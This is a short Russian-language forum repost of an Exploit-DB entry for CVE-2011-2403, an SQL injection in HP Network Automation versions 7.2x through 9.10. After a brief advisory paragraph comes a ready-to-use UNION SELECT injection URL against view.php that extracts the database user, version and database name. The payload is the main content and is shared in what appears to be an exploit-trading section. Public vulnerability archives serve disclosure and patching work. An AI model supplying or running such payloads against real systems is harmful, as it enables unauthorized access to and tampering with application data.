Exploit HP Network Automation 9.10 - SQL Injection

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
36000
Проверка EDB
  1. Пройдено
Автор
ANONYMOUS
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2011-2403
Дата публикации
2011-07-28
Код:
source: https://www.securityfocus.com/bid/48924/info

HP Network Automation is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.

A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.

HP Network Automation 7.2x, 7.5x, 7.6x, 9.0, 9.10 are vulnerable. 

http://www.example.com/view.php?id=1'+union+select+1,2,concat(user(),0x3a,version(),0x3a,database()),4,5,6,7,8,9,10,11'
 
Источник
www.exploit-db.com

Похожие темы